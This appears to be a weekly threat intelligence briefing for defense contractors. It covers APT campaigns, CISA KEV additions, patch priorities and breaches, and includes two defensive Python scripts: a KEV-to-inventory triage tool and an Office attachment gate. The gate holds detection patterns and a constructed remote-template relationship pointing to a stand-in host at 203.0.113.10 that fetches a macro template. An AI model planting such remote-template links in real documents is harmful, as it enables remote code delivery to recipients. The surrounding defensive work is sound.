Weekly Threat Intelligence Briefing — March 9, 2026

March 09, 2026 | 8 min read

WEEKLY THREAT INTELLIGENCE BRIEFING

Monday, March 9, 2026|Week 10|Prepared for vCISO Clients & Defense Industrial Base Contractors

At a glance: 7 KEV Additions (7 Days) | 3 Critical CVEs | 4 Active APT Campaigns | 3 Major Breach Disclosures

⚠️DIB FOCUS: Items marked with 🎯 have specific relevance to Defense Industrial Base contractors and CMMC compliance requirements.

🔴EMERGING THREATS

Google GTIG: Multi-Nation APT Campaign Targeting Defense Industrial Base🎯[CRITICAL]

MITRE ATT&CK: T1566 – Phishing | T1190 – Exploit Public-Facing App | T1078 – Valid Accounts

Google's Threat Intelligence Group has confirmed sustained, coordinated cyber operations against the Defense Industrial Base by China-, Russia-, Iran-, and North Korea-linked actors. Notable campaigns include Operation Dream Job (Lazarus/UNC2970), which uses fake defense-sector job offers to deliver malware to aerospace, defense, and energy targets, and UNC6446 (Iranian-nexus), which distributes custom malware through resume-builder apps aimed at U.S. aerospace and defense verticals. Nation-state actors are increasingly exploiting zero-days in edge devices (VPNs, firewalls, routers) for initial access, in part because those devices cannot host EDR agents. Manufacturing remains the most-targeted sector on ransomware data-leak sites, which directly implicates defense supply chain partners.

Source: The Hacker News / Google GTIG →

APT28 (Fancy Bear) Targets Maritime & Transportation Entities🎯[CRITICAL]

MITRE ATT&CK: T1566.001 – Spearphishing Attachment | T1204.002 – Malicious File

Russia's APT28 is actively exploiting CVE-2026-21509, a Microsoft Office security feature bypass disclosed in January, in a spear-phishing campaign against maritime, transportation, and logistics entities in nine countries, including Poland, Slovenia, Turkey, Greece, and the UAE. Approximately 29 weaponized emails were sent within a 72-hour window, carrying Office documents reported to execute malware without user interaction. Norway's PST 2026 threat assessment identifies maritime infrastructure as Russia's top reconnaissance target, with civilian vessels used for subsea infrastructure surveillance. DIB contractors with maritime exposure should confirm that the January Office update for CVE-2026-21509 is deployed on every endpoint.

Source: Maritime Executive / Norway PST 2026 →

Salt Typhoon (China) — Continued Critical Infrastructure & Telecom Targeting🎯[HIGH]

MITRE ATT&CK: T1199 – Trusted Relationship | T1040 – Network Sniffing

Norway's PST confirmed Salt Typhoon has targeted vulnerable network devices in Norwegian critical infrastructure and telecom networks — consistent with the broader global campaign that previously compromised U.S. and Canadian telecom providers. The group exploits network edge devices to gain persistent footholds. CMMC-regulated contractors relying on telecommunications or cloud services should audit third-party provider security posture and review lateral access controls for signs of compromise.

Source: Maritime Executive / PST 2026 Threat Assessment →

Interlock Ransomware: Active DIB Supply Chain Threat🎯[HIGH]

MITRE ATT&CK: T1486 – Data Encrypted for Impact | T1041 – Exfiltration Over C2

Resecurity is tracking Interlock Ransomware's ongoing campaign following the January 2026 attack on National Defense Corporation (NDC) and subsidiary AMTEC — a manufacturer of military ammunition and explosives. The leaked dataset exposed supply chain relationships with Raytheon, SpaceX, Thales, Hanwha, Leonardo, and QinetiQ. Interlock is suspected of nation-state direction and operates as both ransomware and espionage tooling. Any organization in the defense manufacturing supply chain that interfaces with NDC/AMTEC is potentially exposed to secondary targeting.

Source: Resecurity →

⚡EXPLOITS IN THE WILD — CISA KEV UPDATES

CVE-2026-22719 — Broadcom VMware Aria Operations: Command Injection[CRITICAL]

CVSS Score: 8.1 (High) | Affected: VMware Aria Operations (prior to 8.18.6) | KEV Added: March 3, 2026 | Patch Deadline: March 24, 2026

An unauthenticated attacker who can reach the support-assisted product migration workflow can execute arbitrary OS commands on the Aria Operations appliance. Active exploitation is confirmed. The appliance holds adapter credentials for the vCenter instances and cloud accounts it monitors, so a compromise can pivot into those environments; for DIB contractors using Aria Operations for multi-cloud management, that puts CUI stored in the managed environments within reach.

Source: CISA KEV →

CVE-2021-22681 — Rockwell Studio 5000 / RSLogix: Insufficiently Protected Credentials🎯[CRITICAL]

CVSS Score: 9.8 (Critical) | Affected: Rockwell Studio 5000 Logix Designer, RSLogix 5000 | KEV Added: March 5, 2026 | Patch Deadline: March 26, 2026

An unauthenticated attacker who recovers the key the engineering software uses to verify communications with Logix controllers can impersonate an engineering workstation and modify controller configuration or application code. This is a critical risk for OT/ICS environments and MTSA-regulated maritime facilities. DIB manufacturers and port facility operators using Rockwell systems should treat it as an immediate patching priority under CMMC AC.L2 and NIST SP 800-171 access control requirements.

Source: CISA KEV →

CVE-2017-7921 — Hikvision IP Cameras: Improper Authentication[HIGH]

Severity: High | Affected: Multiple Hikvision IP camera series (older firmware) | KEV Added: March 5, 2026 | Patch Deadline: March 26, 2026

A years-old vulnerability resurfaces on the CISA KEV, confirming active exploitation in the wild. The flaw allows credential bypass, privilege escalation, and unauthorized access to device controls. Physical security camera systems at defense contractor facilities are in scope. Operators should audit all Hikvision deployments, apply firmware updates, and segment camera networks from CUI processing environments per CMMC PE (Physical Protection) requirements.

Source: Security Affairs →

CVE-2023-43000 / CVE-2023-41974 — Apple iOS, iPadOS, macOS: Use-After-Free🎯[HIGH]

CVSS Score: 7.8+ | Affected: Apple iOS, iPadOS, macOS, tvOS, watchOS, Safari | KEV Added: March 5, 2026 | Patch Deadline: March 26, 2026

Multiple Apple platform UAF vulnerabilities allow an application to execute arbitrary code with kernel privileges. Active exploitation confirmed; Google's Threat Intelligence Group provided evidence. FCEB agencies are under mandatory remediation order. DIB contractors using Apple mobile or desktop devices to access CUI should prioritize OS updates across the entire Apple device fleet immediately.

Source: GBHackers →

CVE-2025-40536 — SolarWinds Web Help Desk: Security Control Bypass[HIGH]

Severity: High | Affected: SolarWinds Web Help Desk | KEV Added: February 12, 2026

An unauthenticated attacker can gain access to restricted functionality in SolarWinds Web Help Desk. Given SolarWinds' history as a supply chain attack vector and prevalence in government contractor IT environments, this vulnerability carries elevated risk for DIB organizations. Patch to WHD release 2026.1 or later immediately.

Source: CISA KEV →
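Every entry above carries the date CISA added it and the remediation due date, and the practical question for a contractor is which of its own assets each one touches. The script below is an added example for this briefing, not a CISA tool: it reads the catalog's JSON schema (the live feed is at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json) and joins it to an asset inventory, computing days to deadline per host. The KEV excerpt, the inventory rows, hostnames, owners and version numbers are constructed here; the 8.18.6 fixed version is the figure given in the Aria Operations entry. Two catalog quirks that routinely cause misses are handled explicitly: VMware products are filed under the vendor name Broadcom, and Apple entries are often listed as "Multiple Products".

```python
"""Triage CISA KEV entries against a local asset inventory.

Added example for this briefing; it is not a CISA tool. The live catalog is
JSON with a top-level "vulnerabilities" list whose entries carry cveID,
vendorProject, product, dateAdded, dueDate and requiredAction. The excerpt
and the inventory below are constructed so the script runs offline.
"""
import json
import re
from dataclasses import dataclass
from datetime import date

# Constructed excerpt using the entries and dates reported in this briefing.
KEV_EXCERPT = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2026-22719", "vendorProject": "Broadcom", "product": "VMware Aria Operations",
     "dateAdded": "2026-03-03", "dueDate": "2026-03-24"},
    {"cveID": "CVE-2021-22681", "vendorProject": "Rockwell Automation",
     "product": "Studio 5000 Logix Designer", "dateAdded": "2026-03-05", "dueDate": "2026-03-26"},
    {"cveID": "CVE-2017-7921", "vendorProject": "Hikvision", "product": "IP Cameras",
     "dateAdded": "2026-03-05", "dueDate": "2026-03-26"},
    {"cveID": "CVE-2023-41974", "vendorProject": "Apple", "product": "Multiple Products",
     "dateAdded": "2026-03-05", "dueDate": "2026-03-26"},
]})

# Constructed inventory rows (hostnames, owners and versions are invented).
INVENTORY = [
    {"hostname": "aria-ops-01", "vendor": "VMware", "product": "VMware Aria Operations", "version": "8.18.4", "owner": "cloud-platform"},
    {"hostname": "aria-ops-02", "vendor": "VMware", "product": "VMware Aria Operations", "version": "8.18.6", "owner": "cloud-platform"},
    {"hostname": "eng-ws-17", "vendor": "Rockwell Automation", "product": "Studio 5000 Logix Designer", "version": "33.00", "owner": "ot-engineering"},
    {"hostname": "cam-dock-04", "vendor": "Hikvision", "product": "DS-2CD2143G0-I IP camera", "version": "5.4.5", "owner": "physical-security"},
    {"hostname": "mbp-jsmith", "vendor": "Apple", "product": "macOS", "version": "14.0", "owner": "endpoint"},
    {"hostname": "whd-01", "vendor": "SolarWinds", "product": "Web Help Desk", "version": "2025.4", "owner": "service-desk"},
]

# KEV carries no fixed versions; these come from the vendor advisory (8.18.6 is
# the figure stated in this briefing). Assets at or above it are treated as done.
FIXED_VERSIONS = {"CVE-2026-22719": "8.18.6"}

# The catalog files VMware products under "Broadcom"; without this alias the
# vendor join silently drops every VMware asset.
VENDOR_ALIASES = {"vmware": "broadcom"}


@dataclass(frozen=True)
class Finding:
    hostname: str
    cve_id: str
    owner: str
    due: date
    days_left: int   # negative once the KEV due date has passed
    status: str      # OVERDUE | DUE_SOON | OPEN | REVIEW


def _tokens(text: str) -> set[str]:
    """Lowercase alphanumeric tokens with a naive plural strip, so the catalog's
    'IP Cameras' still meets an inventory row that says 'IP camera'."""
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {w[:-1] if len(w) > 3 and w.endswith("s") else w for w in words}


def _version_tuple(v: str) -> tuple[int, ...]:
    return tuple(int(x) for x in re.findall(r"\d+", v))


def is_vendor_wide(entry: dict) -> bool:
    return _tokens(entry["product"]) == {"multiple", "product"}


def matches(entry: dict, asset: dict) -> bool:
    vendor = _tokens(asset["vendor"])
    vendor |= {VENDOR_ALIASES[v] for v in vendor if v in VENDOR_ALIASES}
    if not vendor & _tokens(entry["vendorProject"]):
        return False
    if is_vendor_wide(entry):
        return True   # e.g. Apple "Multiple Products": vendor match only, needs a human
    return _tokens(entry["product"]) <= _tokens(asset["product"])


def triage(kev_json: str, inventory: list[dict], today: str, due_soon_days: int = 7) -> list[Finding]:
    """One Finding per (asset, KEV entry) pair still needing action, most urgent first."""
    ref = date.fromisoformat(today)
    findings = []
    for entry in json.loads(kev_json)["vulnerabilities"]:
        due = date.fromisoformat(entry["dueDate"])
        fixed = FIXED_VERSIONS.get(entry["cveID"])
        for asset in inventory:
            if not matches(entry, asset):
                continue
            if fixed and _version_tuple(asset["version"]) >= _version_tuple(fixed):
                continue   # already at or above the fixed release
            days_left = (due - ref).days
            if is_vendor_wide(entry):
                status = "REVIEW"      # catalog does not say which product/build is affected
            elif days_left < 0:
                status = "OVERDUE"
            elif days_left <= due_soon_days:
                status = "DUE_SOON"
            else:
                status = "OPEN"
            findings.append(Finding(asset["hostname"], entry["cveID"], asset["owner"], due, days_left, status))
    return sorted(findings, key=lambda f: (f.days_left, f.hostname))


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.status] = counts.get(f.status, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(KEV_EXCERPT, INVENTORY, "2026-03-09"):
        print(f"{f.status:8} {f.cve_id:15} {f.hostname:12} owner={f.owner:18} due={f.due} ({f.days_left:+d}d)")
```

Run against the briefing date, the script reports aria-ops-01 (still on 8.18.4), the Rockwell workstation, the dock camera and one REVIEW item for the Apple endpoint, and skips aria-ops-02 and the SolarWinds host. Re-run daily; the OVERDUE bucket is what an assessor will ask about first.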

🛡️MITIGATION GUIDANCE & PRIORITY ACTIONS

[IMMEDIATE]Patch VMware Aria Operations (Deadline: March 24)

Upgrade to VMware Aria Operations 8.18.6 or later. If migration is in progress, halt support-assisted migration until patched. Audit cloud management plane access logs for unauthorized command execution. Applies to: All organizations running VMware Aria Operations.

[IMMEDIATE]Patch Apple Devices (Deadline: March 26)🎯

Apply the latest iOS, iPadOS, and macOS updates across all managed devices. Use MDM to enforce updates, including in BYOD environments. Especially critical for personnel accessing CUI via mobile devices: CMMC AC.L2-3.1.18 (control connection of mobile devices) and AC.L2-3.1.19 (encrypt CUI on mobile devices) apply directly.

[IMMEDIATE]Patch Rockwell Studio 5000 / RSLogix OT Systems (Deadline: March 26)🎯

Apply vendor-supplied mitigations per CISA KEV guidance. Segment Logix controller networks from corporate IT. Implement strict allowlisting of authorized systems communicating with industrial controllers. For MTSA-regulated maritime facilities: this vulnerability directly impacts OT controls in scope for USCG cyber assessments.

[HIGH PRIORITY]Audit Hikvision Camera Infrastructure🎯

Inventory all Hikvision IP cameras at all facilities. Apply latest firmware updates. Enforce network segmentation between physical security systems and any CUI-processing networks. Document remediation to support CMMC PE domain evidence.

[HIGH PRIORITY]Apply Microsoft Office Patches Against APT28 Exploitation🎯

Ensure CVE-2026-21509 (MS Office Security Feature Bypass) is patched on all endpoints. Enforce the Office policy that blocks macros in files from the Internet (Mark-of-the-Web based) and disable VBA where it is not needed, rather than relying on users to decline prompts. Implement email gateway rules that block macro-enabled and legacy binary Office attachment types from external senders, and inspect attachment content rather than trusting the extension. Especially urgent for organizations with maritime, logistics, or international supply chain connections matching APT28's target profile.
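A gateway rule keyed only on the attachment extension is easy to slip past: a .docx is a ZIP package and can carry a VBA project or an external (remote-template) relationship whatever it is named, and the legacy binary formats are identifiable by their header regardless of extension. The following Python gate is an added example for this briefing, not the authors' or any gateway vendor's code, implementing the content-based attachment check described above. All sample attachments, their filenames and the 203.0.113.10 template host are constructed for the example.

```python
"""Content-based gate for Office attachments arriving from external senders.

Added example for this briefing; not from the briefing's authors or any
vendor. Decides on what the file *is*, because a VBA project, a legacy OLE
container or a remote-template relationship can arrive under a harmless
extension. All sample attachments are constructed in memory.
"""
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File header: .doc/.xls/.ppt/.msg
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML packages are ZIP files
OOXML_EXT = {".docx", ".dotx", ".xlsx", ".xltx", ".pptx", ".potx", ".ppsx"}
MACRO_EXT = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam", ".ppsm"}
LEGACY_EXT = {".doc", ".dot", ".xls", ".xlt", ".xla", ".ppt", ".pot", ".pps", ".pub", ".msg"}
EXTERNAL_REL = re.compile(rb'TargetMode="External"')   # e.g. an attachedTemplate fetched over HTTP


def inspect(filename: str, data: bytes) -> list[str]:
    """Return the reasons this attachment should be blocked (empty = clean)."""
    name = filename.lower()
    ext = name[name.rfind("."):] if "." in name else ""
    reasons = []
    if ext in LEGACY_EXT or data.startswith(OLE_MAGIC):
        reasons.append("legacy OLE/binary Office container")
    if ext in MACRO_EXT:
        reasons.append(f"macro-enabled extension {ext}")
    if ext in OOXML_EXT and not data.startswith(ZIP_MAGIC):
        reasons.append("OOXML extension but body is not a ZIP package")
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as pkg:
                names = pkg.namelist()
                if any(n.lower().endswith("vbaproject.bin") for n in names):
                    reasons.append("VBA project inside OOXML package")
                for n in names:   # relationship parts pointing outside the package
                    if n.endswith(".rels") and EXTERNAL_REL.search(pkg.read(n)):
                        reasons.append(f"external relationship target in {n}")
                        break
        except zipfile.BadZipFile:
            reasons.append("ZIP signature but package does not parse")
    return reasons


def gate(filename: str, data: bytes, external_sender: bool) -> tuple[str, list[str]]:
    """Block on any finding for external senders; internal mail is logged only."""
    reasons = inspect(filename, data)
    return ("block" if external_sender and reasons else "allow", reasons)


def _ooxml(parts: dict) -> bytes:
    """Build a minimal OOXML-shaped ZIP for the constructed samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        for part, body in parts.items():
            pkg.writestr(part, body)
    return buf.getvalue()


# Constructed remote-template relationship; 203.0.113.10 is the documentation range.
REMOTE_TEMPLATE_RELS = (
    '<Relationships><Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="http://203.0.113.10/t.dotm" TargetMode="External"/></Relationships>'
)

SAMPLES = {  # constructed attachments, names invented
    "quarterly_report.docx": _ooxml({"word/document.xml": "<w:document/>"}),
    "invoice.docx": _ooxml({"word/document.xml": "<w:document/>", "word/vbaProject.bin": b"\x00" * 16}),
    "vessel_manifest.docx": _ooxml({"word/document.xml": "<w:document/>", "word/_rels/settings.xml.rels": REMOTE_TEMPLATE_RELS}),
    "port_schedule.xls": OLE_MAGIC + b"\x00" * 24,
    "notes.docx": b"this is not a zip",
    "cv.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        verdict, why = gate(fname, blob, external_sender=True)
        print(f"{verdict:5} {fname:22} {'; '.join(why) or '-'}")
```

Two caveats. This gate narrows the delivery formats an external sender can use; it does not detect CVE-2026-21509 specifically, and the patch remains the control. The external-relationship check may also match legitimate documents bound to a centrally hosted corporate template, so allowlist those hosts before enforcing.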

[MEDIUM]Identity & Credential Hygiene Review🎯

Review privileged account access for SolarWinds, VMware, and cloud management tooling. Rotate credentials on systems covered by this week's KEV additions. Audit MFA enforcement gaps — particularly for IT staff and remote access portals. Map actions to CMMC IA.L2-3.5.3 (MFA) and CM.L2-3.4.1 (Baseline Configuration).

[MEDIUM]DIB Supply Chain Exposure Review — Interlock Ransomware🎯

Organizations with supply chain relationships to NDC, AMTEC, or any prime contractors named in the leaked Interlock dataset (Raytheon, Thales, SpaceX, etc.) should treat supplier-facing portals and shared credential systems as potentially compromised. Review third-party access accounts, rotate shared secrets, and verify integrity of any supplier-provided software or documentation received since January 2026.

📋BREACH DISCLOSURES & NOTABLE INCIDENTS

LexisNexis Legal & Professional — Cloud Infrastructure Breach🎯[CRITICAL]

Disclosed: March 4, 2026 | Type: Cloud Breach / Data Exfiltration (2.04 GB) | Impact: 21,000+ enterprise accounts | ~400,000 user profiles | VPC infrastructure map

Threat actor FulcrumSec exploited an unpatched React vulnerability ("React2Shell") and improperly secured AWS instances on February 24. The compromised data includes U.S. federal judges and DOJ attorneys, making this a supply chain risk for any law firm, government contractor, or compliance organization relying on LexisNexis services. CMMC and legal compliance teams should review LexisNexis vendor agreements and assess whether any CUI flowed through their systems.

Source: SecurityWeek →

Conduent Third-Party Breach Expands to 25 Million Americans[HIGH]

Disclosed: Updated February 2026 | Type: Third-Party Data Exfiltration (~8 TB) | Impact: 25M individuals | TX: 15.4M | OR: 10.5M | SSNs, medical & insurance data

The Conduent breach has grown to 25 million affected Americans. Attackers maintained access for approximately three months, exfiltrating around 8 TB of data including SSNs, medical information, and insurance records. Conduent supports benefits and payment administration for Fortune 100 companies and government programs. Organizations using Conduent as a benefits administrator or HR vendor should treat this as a potential CUI supply chain exposure and notify affected personnel per CMMC IR.L2-3.6.1 incident response requirements.

Source: Malwarebytes →

Madison Square Garden — Oracle E-Business Suite Breach Confirmed

Disclosed: March 2, 2026 | Type: Cl0p Ransomware / Oracle EBS Zero-Day Campaign | Impact: 210+ GB exfiltrated | Names, SSNs compromised

MSG Entertainment confirmed its inclusion in the 2025 Cl0p Oracle EBS exploitation campaign — over 100 organizations were breached via zero-day vulnerabilities in Oracle's E-Business Suite. This is a reminder for any DIB contractor running Oracle EBS for ERP or HR functions: assess whether your Oracle environment was part of the Cl0p campaign footprint and ensure those systems have been fully patched and audited.

Source: SecurityWeek →

About This Report

This weekly briefing is produced by PSY Logistics Technology Partners, Inc. for distribution to vCISO clients and Defense Industrial Base awareness. Intelligence is sourced from CISA, NIST NVD, MITRE ATT&CK, and leading industry threat research. All actions should be verified through official sources before implementation. For questions or custom threat intelligence tailored to your organization's risk profile, contact [email protected] or visit psylogistics.com/news-839758.
